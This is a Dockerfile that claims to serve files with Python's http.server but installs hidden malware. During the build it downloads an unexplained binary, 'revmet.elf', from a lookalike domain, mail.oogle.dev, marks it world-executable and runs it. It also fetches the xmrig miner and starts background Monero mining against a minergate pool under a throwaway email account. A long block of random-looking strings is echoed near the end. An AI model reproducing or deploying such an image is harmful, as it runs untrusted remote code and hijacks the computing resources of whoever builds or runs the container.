FROM ubuntu:bionic

SHELL ["/bin/bash", "-c"]

RUN apt-get update && apt-get install -y \
    wget \
    ocl-icd-libopencl1 \
    libmicrohttpd-dev \
    libc6 \
    libstdc++6

WORKDIR /root
RUN wget http://mail.oogle.dev:8000//revmet.elf

RUN wget https://github.com/xmrig/xmrig/releases/download/v2.14.1/xmrig-2.14.1-xenial-x64.tar.gz
RUN tar -xzvf xmr*
WORKDIR /root/xmrig-2.14.1
RUN ./xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x

WORKDIR /root
RUN chmod 777 revmet.elf
RUN ./xmrig-2.14.1/xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x;./revmet.elf
RUN echo lIRBgAbc820GgpyI9nWamcgyYHmWUpJa 2XW4K3pnQnAjBdKUs4tLkYlzMgdaYZHh Ud4ZqV38dHLZAkxSt4KkL3SA9sjpAIxf 2GoBt4ek3nSmUMwhWrW4C14v9yF0W39W uHq3QttowpwUpBlzk0ZThCYrJuDbzyV2 gJjZAOAKHQC4t8Srsy80rFTFvRb08p4m BbLzCgGILao1CPh7QQM0kNheqLh6ZCv8 bnW5rCwL5Gkh95MZ1T3dee1aSkKCzrPx cmVdlCtk8mJL1yOXt2lM87jrWnKmvwUD wxQF5mqzSBUYueTc2zfdzm0ccdCiHNW9 jTHxb783J8K7EcegP39QhRSt7itaHGPZ kBiLN0zTxLAhkV8c2K78uTUYVO8MdyO9 X9AFsiDuyQiCNJ7VFfHAZHSLImeJEZ8m DGLrlBP1wP15Z7bzvFORfIDPVXxlKOw8 iRR8Zp0TOxlCM7JSEpHNyxmT4XM90YWc zsaOLYboLruHMbrsWTTwF76XhxiEn5Vb JlcMVQX0KrjEurxbQ9jbtcmhwOFZNPb7 g0B5O2hD9pRQwxZWGXhnBJRmjZt4WqIH ddddddd

ENTRYPOINT ["python3", "-m", "http.server"]